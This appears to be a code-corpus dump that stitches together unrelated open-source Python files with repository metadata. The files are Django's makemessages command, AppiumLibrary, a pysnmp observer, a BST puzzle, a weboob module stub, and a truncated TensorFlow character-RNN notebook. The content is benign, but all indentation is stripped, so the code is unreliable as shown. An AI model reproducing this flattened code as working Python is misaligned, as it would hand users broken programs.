find_command, handle_extensions, popen_wrapper,
)
from django.utils.encoding import DEFAULT_LOCALE_ENCODING
from django.utils.functional import cached_property
from django.utils.jslex import prepare_js_for_gettext
from django.utils.text import get_text_list
from django.utils.translation import templatize
plural_forms_re = re.compile(r'^(?P<value>"Plural-Forms.+?\\n")\s*$', re.MULTILINE | re.DOTALL)
STATUS_OK = 0
NO_LOCALE_DIR = object()
def check_programs(*programs):
for program in programs:
if find_command(program) is None:
raise CommandError(
"Can't find %s. Make sure you have GNU gettext tools 0.15 or "
"newer installed." % program
)
@total_ordering
class TranslatableFile:
def __init__(self, dirpath, file_name, locale_dir):
self.file = file_name
self.dirpath = dirpath
self.locale_dir = locale_dir
def __repr__(self):
return "<%s: %s>" % (
self.__class__.__name__,
os.sep.join([self.dirpath, self.file]),
)
def __eq__(self, other):
return self.path == other.path
def __lt__(self, other):
return self.path < other.path
@property
def path(self):
return os.path.join(self.dirpath, self.file)
class BuildFile:
"""
Represent the state of a translatable file during the build process.
"""
def __init__(self, command, domain, translatable):
self.command = command
self.domain = domain
self.translatable = translatable
@cached_property
def is_templatized(self):
if self.domain == 'djangojs':
return self.command.gettext_version < (0, 18, 3)
elif self.domain == 'django':
file_ext = os.path.splitext(self.translatable.file)[1]
return file_ext != '.py'
return False
@cached_property
def path(self):
return self.translatable.path
@cached_property
def work_path(self):
"""
Path to a file which is being fed into GNU gettext pipeline. This may
be either a translatable or its preprocessed version.
"""
if not self.is_templatized:
return self.path
extension = {
'djangojs': 'c',
'django': 'py',
}.get(self.domain)
filename = '%s.%s' % (self.translatable.file, extension)
return os.path.join(self.translatable.dirpath, filename)
def preprocess(self):
"""
Preprocess (if necessary) a translatable file before passing it to
xgettext GNU gettext utility.
"""
if not self.is_templatized:
return
encoding = settings.FILE_CHARSET if self.command.settings_available else 'utf-8'
with open(self.path, 'r', encoding=encoding) as fp:
src_data = fp.read()
if self.domain == 'djangojs':
content = prepare_js_for_gettext(src_data)
elif self.domain == 'django':
content = templatize(src_data, origin=self.path[2:])
with open(self.work_path, 'w', encoding='utf-8') as fp:
fp.write(content)
def postprocess_messages(self, msgs):
"""
Postprocess messages generated by xgettext GNU gettext utility.
Transform paths as if these messages were generated from original
translatable files rather than from preprocessed versions.
"""
if not self.is_templatized:
return msgs
# Remove '.py' suffix
if os.name == 'nt':
# Preserve '.\' prefix on Windows to respect gettext behavior
old_path = self.work_path
new_path = self.path
else:
old_path = self.work_path[2:]
new_path = self.path[2:]
return re.sub(
r'^(#: .*)(' + re.escape(old_path) + r')',
lambda match: match.group().replace(old_path, new_path),
msgs,
flags=re.MULTILINE
)
def cleanup(self):
"""
Remove a preprocessed copy of a translatable file (if any).
"""
if self.is_templatized:
# This check is needed for the case of a symlinked file and its
# source being processed inside a single group (locale dir);
# removing either of those two removes both.
if os.path.exists(self.work_path):
os.unlink(self.work_path)
def normalize_eols(raw_contents):
"""
Take a block of raw text that will be passed through str.splitlines() to
get universal newlines treatment.
Return the resulting block of text with normalized `\n` EOL sequences ready
to be written to disk using current platform's native EOLs.
"""
lines_list = raw_contents.splitlines()
# Ensure last line has its EOL
if lines_list and lines_list[-1]:
lines_list.append('')
return '\n'.join(lines_list)
def write_pot_file(potfile, msgs):
"""
Write the `potfile` with the `msgs` contents, making sure its format is
valid.
"""
pot_lines = msgs.splitlines()
if os.path.exists(potfile):
# Strip the header
lines = dropwhile(len, pot_lines)
else:
lines = []
found, header_read = False, False
for line in pot_lines:
if not found and not header_read:
found = True
line = line.replace('charset=CHARSET', 'charset=UTF-8')
if not line and not found:
header_read = True
lines.append(line)
msgs = '\n'.join(lines)
with open(potfile, 'a', encoding='utf-8') as fp:
fp.write(msgs)
class Command(BaseCommand):
help = (
"Runs over the entire source tree of the current directory and "
"pulls out all strings marked for translation. It creates (or updates) a message "
"file in the conf/locale (in the django tree) or locale (for projects and "
"applications) directory.\n\nYou must run this command with one of either the "
"--locale, --exclude, or --all options."
)
translatable_file_class = TranslatableFile
build_file_class = BuildFile
requires_system_checks = False
leave_locale_alone = True
msgmerge_options = ['-q', '--previous']
msguniq_options = ['--to-code=utf-8']
msgattrib_options = ['--no-obsolete']
xgettext_options = ['--from-code=UTF-8', '--add-comments=Translators']
def add_arguments(self, parser):
parser.add_argument(
'--locale', '-l', default=[], dest='locale', action='append',
help='Creates or updates the message files for the given locale(s) (e.g. pt_BR). '
'Can be used multiple times.',
)
parser.add_argument(
'--exclude', '-x', default=[], dest='exclude', action='append',
help='Locales to exclude. Default is none. Can be used multiple times.',
)
parser.add_argument(
'--domain', '-d', default='django', dest='domain',
help='The domain of the message files (default: "django").',
)
parser.add_argument(
'--all', '-a', action='store_true', dest='all',
help='Updates the message files for all existing locales.',
)
parser.add_argument(
'--extension', '-e', dest='extensions', action='append',
help='The file extension(s) to examine (default: "html,txt,py", or "js" '
'if the domain is "djangojs"). Separate multiple extensions with '
'commas, or use -e multiple times.',
)
parser.add_argument(
'--symlinks', '-s', action='store_true', dest='symlinks',
help='Follows symlinks to directories when examining source code '
'and templates for translation strings.',
)
parser.add_argument(
'--ignore', '-i', action='append', dest='ignore_patterns',
default=[], metavar='PATTERN',
help='Ignore files or directories matching this glob-style pattern. '
'Use multiple times to ignore more.',
)
parser.add_argument(
'--no-default-ignore', action='store_false', dest='use_default_ignore_patterns',
help="Don't ignore the common glob-style patterns 'CVS', '.*', '*~' and '*.pyc'.",
)
parser.add_argument(
'--no-wrap', action='store_true', dest='no_wrap',
help="Don't break long message lines into several lines.",
)
parser.add_argument(
'--no-location', action='store_true', dest='no_location',
help="Don't write '#: filename:line' lines.",
)
parser.add_argument(
'--add-location', dest='add_location',
choices=('full', 'file', 'never'), const='full', nargs='?',
help=(
"Controls '#: filename:line' lines. If the option is 'full' "
"(the default if not given), the lines include both file name "
"and line number. If it's 'file', the line number is omitted. If "
"it's 'never', the lines are suppressed (same as --no-location). "
"--add-location requires gettext 0.19 or newer."
),
)
parser.add_argument(
'--no-obsolete', action='store_true', dest='no_obsolete',
help="Remove obsolete message strings.",
)
parser.add_argument(
'--keep-pot', action='store_true', dest='keep_pot',
help="Keep .pot file after making messages. Useful when debugging.",
)
def handle(self, *args, **options):
locale = options['locale']
exclude = options['exclude']
self.domain = options['domain']
self.verbosity = options['verbosity']
process_all = options['all']
extensions = options['extensions']
self.symlinks = options['symlinks']
ignore_patterns = options['ignore_patterns']
if options['use_default_ignore_patterns']:
ignore_patterns += ['CVS', '.*', '*~', '*.pyc']
self.ignore_patterns = list(set(ignore_patterns))
# Avoid messing with mutable class variables
if options['no_wrap']:
self.msgmerge_options = self.msgmerge_options[:] + ['--no-wrap']
self.msguniq_options = self.msguniq_options[:] + ['--no-wrap']
self.msgattrib_options = self.msgattrib_options[:] + ['--no-wrap']
self.xgettext_options = self.xgettext_options[:] + ['--no-wrap']
if options['no_location']:
self.msgmerge_options = self.msgmerge_options[:] + ['--no-location']
self.msguniq_options = self.msguniq_options[:] + ['--no-location']
self.msgattrib_options = self.msgattrib_options[:] + ['--no-location']
self.xgettext_options = self.xgettext_options[:] + ['--no-location']
if options['add_location']:
if self.gettext_version < (0, 19):
raise CommandError(
"The --add-location option requires gettext 0.19 or later. "
"You have %s." % '.'.join(str(x) for x in self.gettext_version)
)
arg_add_location = "--add-location=%s" % options['add_location']
self.msgmerge_options = self.msgmerge_options[:] + [arg_add_location]
self.msguniq_options = self.msguniq_options[:] + [arg_add_location]
self.msgattrib_options = self.msgattrib_options[:] + [arg_add_location]
self.xgettext_options = self.xgettext_options[:] + [arg_add_location]
self.no_obsolete = options['no_obsolete']
self.keep_pot = options['keep_pot']
if self.domain not in ('django', 'djangojs'):
raise CommandError("currently makemessages only supports domains "
"'django' and 'djangojs'")
if self.domain == 'djangojs':
exts = extensions if extensions else ['js']
else:
exts = extensions if extensions else ['html', 'txt', 'py']
self.extensions = handle_extensions(exts)
if (locale is None and not exclude and not process_all) or self.domain is None:
raise CommandError(
"Type '%s help %s' for usage information."
% (os.path.basename(sys.argv[0]), sys.argv[1])
)
if self.verbosity > 1:
self.stdout.write(
'examining files with the extensions: %s\n'
% get_text_list(list(self.extensions), 'and')
)
self.invoked_for_django = False
self.locale_paths = []
self.default_locale_path = None
if os.path.isdir(os.path.join('conf', 'locale')):
self.locale_paths = [os.path.abspath(os.path.join('conf', 'locale'))]
self.default_locale_path = self.locale_paths[0]
self.invoked_for_django = True
else:
if self.settings_available:
self.locale_paths.extend(settings.LOCALE_PATHS)
# Allow to run makemessages inside an app dir
if os.path.isdir('locale'):
self.locale_paths.append(os.path.abspath('locale'))
if self.locale_paths:
self.default_locale_path = self.locale_paths[0]
if not os.path.exists(self.default_locale_path):
os.makedirs(self.default_locale_path)
# Build locale list
looks_like_locale = re.compile(r'[a-z]{2}')
locale_dirs = filter(os.path.isdir, glob.glob('%s/*' % self.default_locale_path))
all_locales = [
lang_code for lang_code in map(os.path.basename, locale_dirs)
if looks_like_locale.match(lang_code)
]
# Account for excluded locales
if process_all:
locales = all_locales
else:
locales = locale or all_locales
locales = set(locales).difference(exclude)
if locales:
check_programs('msguniq', 'msgmerge', 'msgattrib')
check_programs('xgettext')
try:
potfiles = self.build_potfiles()
# Build po files for each selected locale
for locale in locales:
if self.verbosity > 0:
self.stdout.write("processing locale %s\n" % locale)
for potfile in potfiles:
self.write_po_file(potfile, locale)
finally:
if not self.keep_pot:
self.remove_potfiles()
@cached_property
def gettext_version(self):
# Gettext tools will output system-encoded bytestrings instead of UTF-8,
# when looking up the version. It's especially a problem on Windows.
out, err, status = popen_wrapper(
['xgettext', '--version'],
stdout_encoding=DEFAULT_LOCALE_ENCODING,
)
m = re.search(r'(\d+)\.(\d+)\.?(\d+)?', out)
if m:
return tuple(int(d) for d in m.groups() if d is not None)
else:
raise CommandError("Unable to get gettext version. Is it installed?")
@cached_property
def settings_available(self):
try:
settings.LOCALE_PATHS
except ImproperlyConfigured:
if self.verbosity > 1:
self.stderr.write("Running without configured settings.")
return False
return True
def build_potfiles(self):
"""
Build pot files and apply msguniq to them.
"""
file_list = self.find_files(".")
self.remove_potfiles()
self.process_files(file_list)
potfiles = []
for path in self.locale_paths:
potfile = os.path.join(path, '%s.pot' % self.domain)
if not os.path.exists(potfile):
continue
args = ['msguniq'] + self.msguniq_options + [potfile]
msgs, errors, status = popen_wrapper(args)
if errors:
if status != STATUS_OK:
raise CommandError(
"errors happened while running msguniq\n%s" % errors)
elif self.verbosity > 0:
self.stdout.write(errors)
msgs = normalize_eols(msgs)
with open(potfile, 'w', encoding='utf-8') as fp:
fp.write(msgs)
potfiles.append(potfile)
return potfiles
def remove_potfiles(self):
for path in self.locale_paths:
pot_path = os.path.join(path, '%s.pot' % self.domain)
if os.path.exists(pot_path):
os.unlink(pot_path)
def find_files(self, root):
"""
Get all files in the given root. Also check that there is a matching
locale dir for each file.
"""
def is_ignored(path, ignore_patterns):
"""
Check if the given path should be ignored or not.
"""
filename = os.path.basename(path)
def ignore(pattern):
return fnmatch.fnmatchcase(filename, pattern) or fnmatch.fnmatchcase(path, pattern)
return any(ignore(pattern) for pattern in ignore_patterns)
ignore_patterns = [os.path.normcase(p) for p in self.ignore_patterns]
dir_suffixes = {'%s*' % path_sep for path_sep in {'/', os.sep}}
norm_patterns = []
for p in ignore_patterns:
for dir_suffix in dir_suffixes:
if p.endswith(dir_suffix):
norm_patterns.append(p[:-len(dir_suffix)])
break
else:
norm_patterns.append(p)
all_files = []
ignored_roots = []
if self.settings_available:
ignored_roots = [os.path.normpath(p) for p in (settings.MEDIA_ROOT, settings.STATIC_ROOT) if p]
for dirpath, dirnames, filenames in os.walk(root, topdown=True, followlinks=self.symlinks):
for dirname in dirnames[:]:
if (is_ignored(os.path.normpath(os.path.join(dirpath, dirname)), norm_patterns) or
os.path.join(os.path.abspath(dirpath), dirname) in ignored_roots):
dirnames.remove(dirname)
if self.verbosity > 1:
self.stdout.write('ignoring directory %s\n' % dirname)
elif dirname == 'locale':
dirnames.remove(dirname)
self.locale_paths.insert(0, os.path.join(os.path.abspath(dirpath), dirname))
for filename in filenames:
file_path = os.path.normpath(os.path.join(dirpath, filename))
file_ext = os.path.splitext(filename)[1]
if file_ext not in self.extensions or is_ignored(file_path, self.ignore_patterns):
if self.verbosity > 1:
self.stdout.write('ignoring file %s in %s\n' % (filename, dirpath))
else:
locale_dir = None
for path in self.locale_paths:
if os.path.abspath(dirpath).startswith(os.path.dirname(path)):
locale_dir = path
break
if not locale_dir:
locale_dir = self.default_locale_path
if not locale_dir:
locale_dir = NO_LOCALE_DIR
all_files.append(self.translatable_file_class(dirpath, filename, locale_dir))
return sorted(all_files)
def process_files(self, file_list):
"""
Group translatable files by locale directory and run pot file build
process for each group.
"""
file_groups = {}
for translatable in file_list:
file_group = file_groups.setdefault(translatable.locale_dir, [])
file_group.append(translatable)
for locale_dir, files in file_groups.items():
self.process_locale_dir(locale_dir, files)
def process_locale_dir(self, locale_dir, files):
"""
Extract translatable literals from the specified files, creating or
updating the POT file for a given locale directory.
Use the xgettext GNU gettext utility.
"""
build_files = []
for translatable in files:
if self.verbosity > 1:
self.stdout.write('processing file %s in %s\n' % (
translatable.file, translatable.dirpath
))
if self.domain not in ('djangojs', 'django'):
continue
build_file = self.build_file_class(self, self.domain, translatable)
try:
build_file.preprocess()
except UnicodeDecodeError as e:
self.stdout.write(
'UnicodeDecodeError: skipped file %s in %s (reason: %s)' % (
translatable.file, translatable.dirpath, e,
)
)
continue
build_files.append(build_file)
if self.domain == 'djangojs':
is_templatized = build_file.is_templatized
args = [
'xgettext',
'-d', self.domain,
'--language=%s' % ('C' if is_templatized else 'JavaScript',),
'--keyword=gettext_noop',
'--keyword=gettext_lazy',
'--keyword=ngettext_lazy:1,2',
'--keyword=pgettext:1c,2',
'--keyword=npgettext:1c,2,3',
'--output=-',
]
elif self.domain == 'django':
args = [
'xgettext',
'-d', self.domain,
'--language=Python',
'--keyword=gettext_noop',
'--keyword=gettext_lazy',
'--keyword=ngettext_lazy:1,2',
'--keyword=ugettext_noop',
'--keyword=ugettext_lazy',
'--keyword=ungettext_lazy:1,2',
'--keyword=pgettext:1c,2',
'--keyword=npgettext:1c,2,3',
'--keyword=pgettext_lazy:1c,2',
'--keyword=npgettext_lazy:1c,2,3',
'--output=-',
]
else:
return
input_files = [bf.work_path for bf in build_files]
with NamedTemporaryFile(mode='w+') as input_files_list:
input_files_list.write(('\n'.join(input_files)))
input_files_list.flush()
args.extend(['--files-from', input_files_list.name])
args.extend(self.xgettext_options)
msgs, errors, status = popen_wrapper(args)
if errors:
if status != STATUS_OK:
for build_file in build_files:
build_file.cleanup()
raise CommandError(
'errors happened while running xgettext on %s\n%s' %
('\n'.join(input_files), errors)
)
elif self.verbosity > 0:
# Print warnings
self.stdout.write(errors)
if msgs:
if locale_dir is NO_LOCALE_DIR:
file_path = os.path.normpath(build_files[0].path)
raise CommandError(
'Unable to find a locale path to store translations for '
'file %s' % file_path
)
for build_file in build_files:
msgs = build_file.postprocess_messages(msgs)
potfile = os.path.join(locale_dir, '%s.pot' % self.domain)
write_pot_file(potfile, msgs)
for build_file in build_files:
build_file.cleanup()
def write_po_file(self, potfile, locale):
"""
Create or update the PO file for self.domain and `locale`.
Use contents of the existing `potfile`.
Use msgmerge and msgattrib GNU gettext utilities.
"""
basedir = os.path.join(os.path.dirname(potfile), locale, 'LC_MESSAGES')
if not os.path.isdir(basedir):
os.makedirs(basedir)
pofile = os.path.join(basedir, '%s.po' % self.domain)
if os.path.exists(pofile):
args = ['msgmerge'] + self.msgmerge_options + [pofile, potfile]
msgs, errors, status = popen_wrapper(args)
if errors:
if status != STATUS_OK:
raise CommandError(
"errors happened while running msgmerge\n%s" % errors)
elif self.verbosity > 0:
self.stdout.write(errors)
else:
with open(potfile, 'r', encoding='utf-8') as fp:
msgs = fp.read()
if not self.invoked_for_django:
msgs = self.copy_plural_forms(msgs, locale)
msgs = normalize_eols(msgs)
msgs = msgs.replace(
"#. #-#-#-#-# %s.pot (PACKAGE VERSION) #-#-#-#-#\n" % self.domain, "")
with open(pofile, 'w', encoding='utf-8') as fp:
fp.write(msgs)
if self.no_obsolete:
args = ['msgattrib'] + self.msgattrib_options + ['-o', pofile, pofile]
msgs, errors, status = popen_wrapper(args)
if errors:
if status != STATUS_OK:
raise CommandError(
"errors happened while running msgattrib\n%s" % errors)
elif self.verbosity > 0:
self.stdout.write(errors)
def copy_plural_forms(self, msgs, locale):
"""
Copy plural forms header contents from a Django catalog of locale to
the msgs string, inserting it at the right place. msgs should be the
contents of a newly created .po file.
"""
django_dir = os.path.normpath(os.path.join(os.path.dirname(django.__file__)))
if self.domain == 'djangojs':
domains = ('djangojs', 'django')
else:
domains = ('django',)
for domain in domains:
django_po = os.path.join(django_dir, 'conf', 'locale', locale, 'LC_MESSAGES', '%s.po' % domain)
if os.path.exists(django_po):
with open(django_po, 'r', encoding='utf-8') as fp:
m = plural_forms_re.search(fp.read())
if m:
plural_form_line = m.group('value')
if self.verbosity > 1:
self.stdout.write("copying plural forms: %s\n" % plural_form_line)
lines = []
found = False
for line in msgs.splitlines():
if not found and (not line or plural_forms_re.search(line)):
line = plural_form_line
found = True
lines.append(line)
msgs = '\n'.join(lines)
break
return msgs
|
edmorley/django
|
django/core/management/commands/makemessages.py
|
Python
|
bsd-3-clause
| 27,345
| 0.001682
|
# -*- coding: utf-8 -*-
import os
from AppiumLibrary.keywords import *
from AppiumLibrary.version import VERSION
__version__ = VERSION
class AppiumLibrary(
_LoggingKeywords,
_RunOnFailureKeywords,
_ElementKeywords,
_ScreenshotKeywords,
_ApplicationManagementKeywords,
_WaitingKeywords,
_TouchKeywords,
_KeyeventKeywords,
_AndroidUtilsKeywords,
_ScreenrecordKeywords
):
"""AppiumLibrary is a Mobile App testing library for Robot Framework.
= Locating or specifying elements =
All keywords in AppiumLibrary that need to find an element on the page
take an argument, either a ``locator`` or a ``webelement``. ``locator``
is a string that describes how to locate an element using a syntax
specifying different location strategies. ``webelement`` is a variable that
holds a WebElement instance, which is a representation of the element.
== Using locators ==
By default, when a locator is provided, it is matched against the key attributes
of the particular element type. For iOS and Android, key attribute is ``id`` for
all elements and locating elements is easy using just the ``id``. For example:
| Click Element id=my_element
New in AppiumLibrary 1.4, ``id`` and ``xpath`` are not required to be specified,
however ``xpath`` should start with ``//`` else just use ``xpath`` locator as explained below.
For example:
| Click Element my_element
| Wait Until Page Contains Element //*[@type="android.widget.EditText"]
Appium additionally supports some of the [https://w3c.github.io/webdriver/webdriver-spec.html|Mobile JSON Wire Protocol] locator strategies.
It is also possible to specify the approach AppiumLibrary should take
to find an element by specifying a lookup strategy with a locator
prefix. Supported strategies are:
| *Strategy* | *Example* | *Description* | *Note* |
| identifier | Click Element `|` identifier=my_element | Matches by @id attribute | |
| id | Click Element `|` id=my_element | Matches by @resource-id attribute | |
| accessibility_id | Click Element `|` accessibility_id=button3 | Accessibility options utilize. | |
| xpath | Click Element `|` xpath=//UIATableView/UIATableCell/UIAButton | Matches with arbitrary XPath | |
| class | Click Element `|` class=UIAPickerWheel | Matches by class | |
| android | Click Element `|` android=UiSelector().description('Apps') | Matches by Android UI Automator | |
| ios | Click Element `|` ios=.buttons().withName('Apps') | Matches by iOS UI Automation | |
| nsp | Click Element `|` nsp=name=="login" | Matches by iOSNsPredicate | Check PR: #196 |
| chain | Click Element `|` chain=XCUIElementTypeWindow[1]/* | Matches by iOS Class Chain | |
| css | Click Element `|` css=.green_button | Matches by css in webview | |
| name | Click Element `|` name=my_element | Matches by @name attribute | *Only valid* for Selendroid |
== Using webelements ==
Starting with version 1.4 of the AppiumLibrary, one can pass an argument
that contains a WebElement instead of a string locator. To get a WebElement,
use the new `Get WebElements` or `Get WebElement` keyword.
For example:
| @{elements} Get Webelements class=UIAButton
| Click Element @{elements}[2]
"""
ROBOT_LIBRARY_SCOPE = 'GLOBAL'
ROBOT_LIBRARY_VERSION = VERSION
def __init__(self, timeout=5, run_on_failure='Capture Page Screenshot'):
"""AppiumLibrary can be imported with optional arguments.
``timeout`` is the default timeout used to wait for all waiting actions.
It can be later set with `Set Appium Timeout`.
``run_on_failure`` specifies the name of a keyword (from any available
libraries) to execute when a AppiumLibrary keyword fails.
By default `Capture Page Screenshot` will be used to take a screenshot of the current page.
Using the value `No Operation` will disable this feature altogether. See
`Register Keyword To Run On Failure` keyword for more information about this
functionality.
Examples:
| Library | AppiumLibrary | 10 | # Sets default timeout to 10 seconds |
| Library | AppiumLibrary | timeout=10 | run_on_failure=No Operation | # Sets default timeout to 10 seconds and does nothing on failure |
"""
for base in AppiumLibrary.__bases__:
base.__init__(self)
self.set_appium_timeout(timeout)
self.register_keyword_to_run_on_failure(run_on_failure)
|
jollychang/robotframework-appiumlibrary
|
AppiumLibrary/__init__.py
|
Python
|
apache-2.0
| 5,544
| 0.004509
|
#
# This file is part of pysnmp software.
#
# Copyright (c) 2005-2019, Ilya Etingof <etingof@gmail.com>
# License: http://snmplabs.com/pysnmp/license.html
#
from pysnmp import error
class MetaObserver(object):
"""This is a simple facility for exposing internal SNMP Engine
working details to pysnmp applications. These details are
basically local scope variables at a fixed point of execution.
Two modes of operations are offered:
1. Consumer: app can request an execution point context by execution point ID.
2. Provider: app can register its callback function (and context) to be invoked
once execution reaches specified point. All local scope variables
will be passed to the callback as in #1.
It's important to realize that execution context is only guaranteed
to exist to functions that are at the same or deeper level of invocation
relative to execution point specified.
"""
def __init__(self):
self.__observers = {}
self.__contexts = {}
self.__execpoints = {}
def registerObserver(self, cbFun, *execpoints, **kwargs):
if cbFun in self.__contexts:
raise error.PySnmpError('duplicate observer %s' % cbFun)
else:
self.__contexts[cbFun] = kwargs.get('cbCtx')
for execpoint in execpoints:
if execpoint not in self.__observers:
self.__observers[execpoint] = []
self.__observers[execpoint].append(cbFun)
def unregisterObserver(self, cbFun=None):
if cbFun is None:
self.__observers.clear()
self.__contexts.clear()
else:
for execpoint in dict(self.__observers):
if cbFun in self.__observers[execpoint]:
self.__observers[execpoint].remove(cbFun)
if not self.__observers[execpoint]:
del self.__observers[execpoint]
def storeExecutionContext(self, snmpEngine, execpoint, variables):
self.__execpoints[execpoint] = variables
if execpoint in self.__observers:
for cbFun in self.__observers[execpoint]:
cbFun(snmpEngine, execpoint, variables, self.__contexts[cbFun])
def clearExecutionContext(self, snmpEngine, *execpoints):
if execpoints:
for execpoint in execpoints:
del self.__execpoints[execpoint]
else:
self.__execpoints.clear()
def getExecutionContext(self, execpoint):
return self.__execpoints[execpoint]
|
etingof/pysnmp
|
pysnmp/entity/observer.py
|
Python
|
bsd-2-clause
| 2,572
| 0.000778
|
'''
Problem:
Find the kth smallest element in a bst without using static/global variables.
'''
def find(node, k, items=0):
# Base case.
if not node:
return items, None
# Decode the node.
left, value, right = node
# Check left.
index, result = find(left, k, items)
# Exit early.
if result:
return index, result
# Check this node.
next = index + 1
if next == k:
return next, value
# Check the right.
return find(right, k, next)
test = (((None, 1, None), 2, (None, 3, None)), 4, ((None, 5, None), 5, (None, 6, None)))
#test = ((None, 1, None), 2, (None, 3, None))
print(find(test, 11))
|
RishiRamraj/interviews
|
solutions/algorithms/bst.py
|
Python
|
mit
| 667
| 0.004498
|
# -*- coding: utf-8 -*-
# Copyright(C) 2017 Juliette Fourcot
#
# This file is part of a weboob module.
#
# This weboob module is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This weboob module is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this weboob module. If not, see <http://www.gnu.org/licenses/>.
from __future__ import unicode_literals
from .module import EnsapModule
__all__ = ['EnsapModule']
|
laurentb/weboob
|
modules/ensap/__init__.py
|
Python
|
lgpl-3.0
| 885
| 0
|
# coding: utf-8
# # Simple Character-level Language Model using vanilla RNN
# 2017-04-21 jkang
# Python3.5
# TensorFlow1.0.1
#
# - <p style="color:red">Different window sizes were applied</p> e.g. n_window = 3 (three-character window)
# - input: 'hello_world_good_morning_see_you_hello_grea'
# - output: 'ello_world_good_morning_see_you_hello_great'
#
# ### Reference:
# - https://github.com/tensorflow/tensorflow/blob/master/tensorflow/contrib/rnn/python/ops/core_rnn_cell_impl.py
# - https://github.com/aymericdamien/TensorFlow-Examples
# - https://hunkim.github.io/ml/
#
# ### Comment:
# - 단어 단위가 아닌 문자 단위로 훈련함
# - 하나의 example만 훈련에 사용함
# : 하나의 example을 windowing하여 여러 샘플을 만들어 냄 (새로운 샘플의 크기는 window_size)
# - Cell의 종류는 BasicRNNCell을 사용함 (첫번째 Reference 참조)
# - dynamic_rnn방식 사용 (기존 tf.nn.rnn보다 더 시간-계산 효율적이라고 함)
# - AdamOptimizer를 사용
# In[1]:
import tensorflow as tf
import numpy as np
import matplotlib.pyplot as plt
import random
# Input/Ouput data
char_raw = 'hello_world_good_morning_see_you_hello_great'
char_list = sorted(list(set(char_raw)))
char_to_idx = {c: i for i, c in enumerate(char_list)}
idx_to_char = {i: c for i, c in enumerate(char_list)}
char_data = [char_to_idx[c] for c in char_raw]
char_data_one_hot = tf.one_hot(char_data, depth=len(
char_list), on_value=1., off_value=0., axis=1, dtype=tf.float32)
char_input = char_data_one_hot[:-1, :] # 'hello_world_good_morning_see_you_hello_grea'
char_output = char_data_one_hot[1:, :] # 'ello_world_good_morning_see_you_hello_great'
with tf.Session() as sess:
char_input = char_input.eval()
char_output = char_output.eval()
# In[2]:
# Learning parameters
learning_rate = 0.001
max_iter = 1000
# Network Parameters
n_input_dim = char_input.shape[1]
n_input_len = char_input.shape[0]
n_output_dim = char_output.shape[1]
n_output_len = char_output.shape[0]
n_hidden = 100
n_window = 2 # number of characters in one window (like a mini-batch)
# TensorFlow graph
# (batch_size) x (time_step) x (input_dimension)
x_data = tf.placeholder(tf.float32, [None, None, n_input_dim])
# (batch_size) x (time_step) x (output_dimension)
y_data = tf.placeholder(tf.float32, [None, None, n_output_dim])
# Parameters
weights = {
'out': tf.Variable(tf.truncated_normal([n_hidden, n_output_dim]))
}
biases = {
'out': tf.Variable(tf.truncated_normal([n_output_dim]))
}
# In[3]:
def make_window_batch(x, y, window_size):
'''
This function will generate samples based on window_size from (x, y)
Although (x, y) is one example, it will create multiple examples with the length of window_size
x: (time_step) x (input_dim)
y: (time_step) x (output_dim)
x_out: (total_batch) x (batch_size) x (window_size) x (input_dim)
y_out: (total_batch) x (batch_size) x (window_size) x (output_dim)
total_batch x batch_size <= examples
'''
# (batch_size) x (window_size) x (dim)
# n_examples is calculated by sliding one character with window_size
n_examples = x.shape[0] - window_size + 1 # n_examples = batch_size
x_batch = np.empty((n_examples, window_size, x.shape[1]))
y_batch = np.empty((n_examples, window_size, y.shape[1]))
for i in range(n_examples):
x_batch[i, :, :] = x[i:i + window_size, :]
y_batch[i, :, :] = y[i:i + window_size, :]
z = list(zip(x_batch, y_batch))
random.shuffle(z)
x_batch, y_batch = zip(*z)
x_batch = np.array(x_batch)
y_batch = np.array(y_batch)
# (total_batch) x (batch_size) x (window_size) x (dim)
# total_batch is set to 1 (no mini-batch)
x_new = x_batch.reshape((n_examples, window_size, x_batch.shape[2]))
y_new = y_batch.reshape((n_examples, window_size, y_batch.shape[2]))
return x_new, y_new, n_examples
# In[4]:
def RNN(x, weights, biases):
cell = tf.contrib.rnn.BasicRNNCell(n_hidden) # Make RNNCell
outputs, states = tf.nn.dynamic_rnn(cell, x, time_major=False, dtype=tf.float32)
'''
**Notes on tf.nn.dynamic_rnn**
- 'x' can have shape (batch)x(time)x(input_dim), if time_major=False or
(time)x(batch)x(input_dim), if time_major=True
- 'outputs' can have the same shape as 'x'
(batch)x(time)x(input_dim), if time_major=False or
(time)x(batch)x(input_dim), if time_major=True
- 'states' is the final state, determined by batch and hidden_dim
'''
# outputs[-1] is outputs for the last example in the mini-batch
return tf.matmul(outputs[-1], weights['out']) + biases['out']
def softmax(x):
rowmax = np.max(x, axis=1)
x -= rowmax.reshape((x.shape[0] ,1)) # for numerical stability
x = np.exp(x)
sum_x = np.sum(x, axis=1).reshape((x.shape[0],1))
return x / sum_x
pred = RNN(x_data, weights, biases)
cost = tf.reduce_mean(tf.squared_difference(pred, y_data))
optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(cost)
# In[5]:
# Learning
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
for i in range(max_iter):
loss = 0
x_batch, y_batch, n_examples = make_window_batch(char_input, char_output, n_window)
for ibatch in range(x_batch.shape[0]):
x_train = x_batch[ibatch, :, :].reshape((1,-1,n_input_dim))
y_train = y_batch[ibatch, :, :].reshape((1,-1,n_output_dim))
x_test = char_input.reshape((1, n_input_len, n_input_dim))
y_test = char_output.reshape((1, n_input_len, n_input_dim))
c, _ = sess.run([cost, optimizer], feed_dict={
x_data: x_train, y_data: y_train})
p = sess.run(pred, feed_dict={x_data: x_test, y_data: y_test})
loss += c
mean_mse = loss / n_examples
if i == (max_iter-1):
pred_act = softmax(p)
if (i+1) % 100 == 0:
pred_out = np.argmax(p, axis=1)
accuracy = np.sum(char_data[1:] == pred_out)/n_output_len*100
print('Epoch:{:>4}/{},'.format(i+1,max_iter),
'Cost:{:.4f},'.format(mean_mse),
'Acc:{:>.1f},'.format(accuracy),
'Predict:', ''.join([idx_to_char[i] for i in pred_out]))
# In[6]:
# Probability plot
fig, ax = plt.subplots()
fig.set_size_inches(15,20)
plt.title('Input Sequence', y=1.08, fontsize=20)
plt.xlabel('Probability of Next Character(y) Given Current One(x)'+
